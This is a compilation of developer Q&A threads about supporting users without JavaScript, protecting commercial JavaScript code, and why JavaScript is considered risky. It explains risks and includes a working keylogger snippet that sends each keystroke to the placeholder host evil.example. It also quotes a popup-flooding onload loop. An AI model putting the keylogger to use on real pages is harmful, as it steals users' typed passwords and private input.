Search engines will, at best, only run a limited set of your javascript. You want to work well enough without javascript to allow them to still index your site.
Of course, you need to know your audience. You might be doing work for a corporate intranet where you know that everyone has javascript (though even here I'd argue there's a growing trend where these sites are made available to teleworkers with unknown/unrestricted browsers). Or you might be building an app for the blind community where no one has it. In the case of the public internet, you can typically figure about 95% of your users will support it in some fashion (source cited by someone else in one of the links below). That number sounds pretty high, but it can be misleading; turn it around, and if you don't support javascript you're turning away 1 visitor in 20.
See these:
https://stackoverflow.com/questions/121108/how-many-people-disable-javascript
https://stackoverflow.com/questions/822872/do-web-sites-really-need-to-cater-for-browsers-that-dont-have-javascript-enabled
You should weigh the options and ask yourself:
1) what percentage of users will have javascript turned off. (according to this site, only 5% of the world has it turned off or not available.)
2) will those users be willing to turn it on
3) of those that aren't willing to turn it on, or switch to another browser or device that has javascript enabled, is the lost revenue more than the effort to build a separate non-javascript version?
Instinctively, I say most times the answer is no, don't waste the time building two sites.
My question is, if, in this day and age, we should be required to cater for users that don't have javascript enabled?
Yes, definitely, if the AJAX functionality is core to the working of your site. If you don't, you are effectively denying users who don't have Javascript enabled access to your website, and although this is a rather small proportion (<5% I believe), it means that they won't be able to use your site at all, because the core functions are not available to them.
Of course if you're doing more trivial things with AJAX that just enhance the user experience but are not actually central to the core functionality of the site, then this probably isn't necessary.
Depends really.
I personally switch off JavaScript all the time because I don't trust lots of sites.
However, since your users have explicitly asked for your application, you can assume they will trust it, and there is no point in doing extra work.
More to the point, if you have that strong AJAX-wherever-possible requirement, the question seems odd.
This is a bit like beating a dead horse, but I'll have a go at it, sure.
I think there could be two basic approaches to this:
1. Using AJAX (and, basically, JavaScript) to enhance the experience of the users, while making sure that all of the application's features work without JavaScript.
When I am following this principle, I develop the interface in two phases: first without considering JavaScript at all (say, using a framework that doesn't know about JavaScript), and then augmenting certain workflows by adding AJAX-y validation (I don't like pure JS validation, sorry) and so on.
This means that if the user has JavaScript disabled, your app shall in no way break or become unusable for him.
2. Using JavaScript to its fullest, "no JavaScript, no go" style. If JavaScript is not available, the user will not be able to use your application at all. It is important to note that, in my opinion, there is no middle ground: if you are trying to be in both worlds at once, you are doing too much extra work. Removing the constraint of supporting no-JavaScript users obviously adds more opportunities to create a richer user experience, and it makes creating that experience much easier.
I think that depends on the type of web application you are going to build. For example, in an e-commerce application the checkout process should probably work without JavaScript, because there are some people who deactivate JS for checking out (in our experience). In a Web 2.0 application, in my opinion, it isn't necessary to support a non-JS browser experience.
Developing for both also complicates the development process and is more cost-intensive: you double your web-testing efforts (testing with and without JS) and have to think differently in the planning phase.
I think it depends on the market segment you're aiming for. If you're going for a tech crowd (such as Stackoverflow.com, or perhaps Slashdot), then you're probably fine in expecting users to have JS installed and active.
Other sites, with a moderately tech-aware audience, may suffer from users knowing enough about JS-based exploits to have deactivated JS, but not knowing enough to enable Scriptblock (or the equivalent for their browser).
The non-tech-aware audience is probably with the tech crowd, since they likely just don't know how to disable JS, or why they might want to, regardless of the risk.
In short, you should cater to spiders without JavaScript enabled, but only to the degree necessary to index the data that you want to expose to the public. Your browser requirements of IE7+ and FF3+ exclude far more people than the total number of people who disable JavaScript. And of those who do disable it, the vast majority know how to enable it when necessary.
I asked myself the same question the other day, and my answer was that in order to use my application one must have JavaScript enabled. I also checked various AJAX-powered sites, even Stack Overflow.
But considering this, I also believe that you do need to support some degree of prehistoric browsing. The main idea is to not let the application break when users don't have JavaScript enabled. The application should still display relevant data; its functionality would just be limited.
To add to some of the old discussion on this page. Google is now searching JavaScript: http://www.i-programmer.info/news/81-web-general/4248-google-now-searches-javascript.html
This is an issue that I was thinking about just a few days ago. Here is some information
In Google Chrome there is no way (menu/option) inside the browser to turn off Javascript.
Many websites including those from leading names like Google, etc., will not work without Javascript.
According to stats over 95% of visitors have Javascript enabled now.
These stats made me think. Do I have to break my back writing a lot of background code and everything for users who have disabled Javascript?
My conclusion was this. Yes, I have to include Javascript support, but not at the cost of sanity. I.e. I can afford to give it a low priority.
So I am going to have support for non-javascript browsing, but I will build most of it after my site is deployed.

Selling Javascript Code [closed]

I am planning to sell some JavaScript code that I have written. Given the current state of browsers, it's quite possible to write complex code. I think I will face a couple of problems / have a couple of questions:
JavaScript, being client-side, can be easily copied as soon as I show someone a demo.
Are there any companies selling JavaScript code? Not dual-licensed like ExtJS.
Should I obfuscate my code? Should I hard-code the website on which it will run, pack it, etc.?
How do I go about this?
Thank you for your time.
To be honest, with any software, no method of protection is 100% safe from being misused. Think, for example, with even large-scale commercial pieces of software, such as Photoshop, Windows or OS X. All have methods in place to try and prevent people from misusing or pirating their software, and to the average user, this is fine, and prevents people from simply copying their software and distributing it illegally.
However, if people really want to use software illegally, they'll find a way - they may reverse-engineer it, and then create keygens or remove piracy mechanisms completely, for example.
Of course, being written in a scripting language, applications using JavaScript are more susceptible to misuse since, as you pointed out, the JavaScript runs client-side and anyone can view it quite easily. However, for many of your customers this shouldn't be a problem, and it is quite common nowadays for companies to sell software of this nature commercially, using JavaScript as the main method of implementation.
There may be a few people who try to misuse your software, but as I pointed out above, this occurs in all walks of software development, and all you can do is your best to prevent it. As you suggested, JavaScript obfuscation is a good way to make the source less readable (with some limitations, for example an obfuscator stripping legitimate lines of code it believes to be unnecessary), but at the end of the day you just have to remember that most people will use your software legitimately, and that over-protecting it will only annoy your legitimate users in order to deter a small minority who would likely find a workaround to any mechanism anyway.
Companies that normally sell JavaScript components are really selling support for those components. Guaranteed bug fixes, prompt response to questions, etc.
The easiest thing to do to obfuscate it would be to use the Online YUI minifier.
Basically, the effort required to de-obfuscate it, is pretty similar to having to rewrite it. That won't necessarily stop someone from stealing it, but again, it just depends on what kind of market you are in. Most people are honest.
Pretty much all JavaScript is open source by design. Seems that plenty of people are making money in open source. I wouldn't sweat it too much. Sell on the value or the service.
There are numerous companies which sell Javascript 'components', and I know at least some of them obfuscate their code. A lot of obfuscators & compressors do some horrendous things with eval and encoded strings... I'd recommend against going down that path.
In my experience, all obfuscated code does is frustrate your honest customers. In many ways it comes down to who you're targeting. If you're making drop-in components, obfuscating things isn't going to be a huge problem. If you're targeting developers, you're going to need to keep your code open, IMO.
If you choose to obfuscate, the best option for performance and reliability is going to be a JavaScript compressor.
Milonic sells some JavaScript components.
Not sure how they protect them, but they have been in business for a long time.
Remember that "stealing" the code is not just about deobfuscation, but also about just straight-up copy-pasting it to another site and using it as-is. It would not be unreasonable to include some type of licensing check in the script, perhaps checking the domain it was served from against a central server. Of course, then you'd need obfuscation just to keep people from removing the licensing check...
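The crude shape of such a check, purely as an illustration (the domains and the ping URL are made up, and anyone can simply delete these lines, which is exactly the point made above):

// refuse to run on unlicensed domains
var LICENSED = ['customer-site.example', 'www.customer-site.example'];
if (LICENSED.indexOf(window.location.hostname) === -1) {
  throw new Error('This component is not licensed for ' + window.location.hostname);
}

// optionally phone home so the vendor can spot unlicensed installs
new Image().src = 'https://vendor.example/ping?host=' +
  encodeURIComponent(window.location.hostname);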
There are some companies selling JS code. How well they do it, I don't know.
The only thing you can do to protect your code is to obfuscate it.

Why is JavaScript considered bad by some? [closed]

Why is JavaScript allowed to be disabled in the browser? (i.e. Why is it considered bad?)
<body onload="for (i = 0; i < 1000000; i++) { window.open('samplesite.com?pageid=' + i); }">
Why is javascript allowed to be disabled in the browser? (i.e. Why is it considered bad?)
Because it can be grossly misused (blinking images, anyone?), may slow the browser down and of course there's always the (very justified!) fear of exploited security holes.
First of all, with JavaScript you can trigger events that the user might not want, e.g. changing the size of the window...
On the other hand, think about people who are somehow limited... What if your user is blind and uses a screen reader while your page continuously changes its content somehow? There are many reasons against JavaScript when it comes to accessibility...
Back in the day, it used to be:
A source of annoying cursor-following animations (I am sure you remember stuff like raining sheep or clocks following your cursor... I want to find the smart*** who thought of that and slap them with a trout)
Considered insecure
Something that served no purpose but to bog down the browser
However, over the years it has become more advanced and applied with more thinking behind it.
Historically it has been a huge security problem for web-based services. Also, as with any technology that is exploitable and has a low technical barrier to entry, it ends up the tool of the low-brow troublemaker (script kiddies). Quick searches for JavaScript or XSS in a security exploit database will show hundreds of pages of vulnerabilities.
JavaScript is often considered dangerous or at least annoying for two reasons:
Websites can suddenly do stuff that you don't want them to do, e.g. open popups
Websites can suddenly keep you from doing stuff that you want to do, e.g. disabling right-clicks
Now, in the vast majority of cases JavaScript is harmless and can really enhance the user experience (Ajax comes to mind). But all it takes is one malicious site that uses JavaScript to do evil (TM) things like Cross-site Scripting. For that reason it is commonly considered best practice to disable JavaScript globally and to allow it for just those sites or domains that you explicitly trust. In this day and age being paranoid on the Internet is actually a good thing.
It's a weakly-typed scripting language. Programmers who usually use "big strong" languages look down upon such nonsense. Shame on you for even considering using it, and my God have mercy on your soul.
It can cause security problems. Especially in old versions of IE (not so much anymore).
Or maybe it has something to do with Stallman's ranting ;-)
The main consideration is security. Drive-by downloads that exploit browser security holes via JavaScript are currently the most common way for malware to spread.
As well as what others have said, it confuses search engines. The more 'dynamic' content you add, the higher the chances it cannot be indexed. In addition, the Internet is used by many as a reference library. Books in a real library do not change things around while you are reading the page. You may think of your site as an "application", but your users may prefer to treat it as a "document".
In short, JavaScript obfuscates information, sometimes to the point of completely denying access (i.e., the JavaScript code is buggy and crashes). A classic example of this was that I was unable to watch the Live8 concert broadcast by AOL a few years back, because the JavaScript code was so poorly written it didn't actually work on my girlfriend's AOL browser (ironic, I know). I tried to get to the movie URL directly, but the obfuscation was so complex I couldn't find it. It did nothing to endear me to AOL.
BTW, I happen to be one of those people who disable JavaScript by default. If I need it I can enable it for a specific site or page in 2 seconds (really) using the NoScript add-on for Firefox.
Some companies, or business units, have a policy of not allowing JavaScript to be turned on, out of concern about security exploits. That may be the biggest problem: since it can't be locked down securely, it must be disabled. If you could run JavaScript in a strict mode that doesn't allow AJAX requests, for example, you might find more people willing to enable it on computers where security is a concern.
As long as a user can go to a website, and information can be sent transparently over the Internet regarding what a user is doing, then these security concerns will exist.
For example, I could have a Firefox plugin that appears to be useful but could possibly send unwanted info to a website.
Because it shifts load from the server to the client and there is no way to control to what extent.
I work with JavaScript every day and respectfully acknowledge what it has made possible, but sometimes when I browse a very simple page, and the interface reacts lightning fast because there is nothing to render but pure, simple HTML, I think that this used to be the original purpose of the internet. You can, and I am exaggerating only a little, browse such pages on a 600 MHz Pentium with 128 megabytes of RAM without problems. Whereas for a JavaScript-heavy, effect-laden "rich" website, you need massive resources on the client side for a halfway smooth experience, and you need to update your equipment almost as often as gamers do.
Also, I generally feel some, not hostility, but slight annoyance towards JavaScript, because it massively increased development costs by adding a host of incompatible target platforms, versions, obscurities and specialties to cater for, as well as a generally bug-prone, hard-to-debug and volatile environment to work in.
That said, I think the industry owes the creators of jQuery, Prototype and the like big, big thanks, among many others.
JavaScript, as the inventor of JSON called it, is the virtual machine for the world. It's where billions of people are. This great exposure comes with dangers other languages do not have to face.
Example: write a site that just 'redirects' you to another site where you can sign in. If you are not completely in control of your browser, URL, etc., some JavaScript could have loaded the page content from another site and could be logging your keystrokes. This can be achieved with a few lines of JavaScript. It's not really the fault (if it's a fault at all) of JavaScript, but of all the components together (the browser, HTML, and this vast space we call the Internet).
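Those "few lines" are no exaggeration; a page that has been tampered with only needs something like this (evil.example is a placeholder, and same-origin and CSP protections in modern browsers exist precisely to make such tricks harder):

// capture every keystroke on the page and ship it elsewhere
document.addEventListener('keydown', function (e) {
  new Image().src = 'https://evil.example/log?k=' + encodeURIComponent(e.key);
});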
Why is JavaScript allowed to be disabled in the browser? (i.e. Why is it considered bad?)
Because browsers are not perfect! Being able to disable JavaScript gives you a way to keep yourself safe when you need it.
When a security risk is found out, vendors will simply post on their home page:
Please disable JavaScript until this is fixed.
Like this (I don't have the official page right now, so this is googled from somewhere):
http://browsers.about.com/b/2009/07/16/firefox-3-5-users-should-take-action-immediately.htm
However, until a fix is released, I recommend that you either disable JavaScript completely or use another browser.
There are a few rare instances where JavaScript can be dangerous (but so can anything, including the massively ubiquitous Flash). The reason users actually do disable it or use addons like NoScript is largely unjustified paranoia.
In the end, users don't stick with behavior that breaks the websites they want to experience. So, I wouldn't expect JavaScript paranoia to be a long-term issue as only more and more sites depend on it (like this one).
It's similar to the hype we saw around cookies several years ago.
It can crash the browser or do annoying things to users.
However, nowadays JavaScript has become such an integrated part of the internet (Gmail, bill paying for many companies' sites, etc.) that if you disabled it, browsing could arguably become difficult for you unless you maintained exceptions.
JavaScript has some very "odd" language features, like handling a missing semicolon at the end of a statement by silently ignoring the parse error ("semicolon insertion"), or the behaviour of the typeof operator (an array is an "object").
You really need to know the language to know which things you should do and which are bad.
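Both quirks are easy to demonstrate:

typeof [1, 2, 3];  // "object", not "array"
typeof null;       // also "object"

function money() {
  return            // a semicolon is silently inserted here...
  {
    amount: 42      // ...so this object literal is never returned
  };
}
money();            // undefined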
But there are also really good points about the language, like that it fully supports functional programming.
It is only bad if you visit questionable sites. Without JavaScript you wouldn't have apps like Gmail, Yahoo Finance, etc.
Why is JavaScript allowed to be disabled in the browser?
Perhaps because computers are tools that serve humans? Computers speaking to computers via a protocol can mandate specific behaviour. Developers writing software for users have no such luxury.
It would be pointless for browser vendors to mandate that JavaScript "must" be enabled, since there are plenty of people who can't use it or don't want to. Especially since 90% of the time it's just being used by some spotty hipster to animate a cat picture.
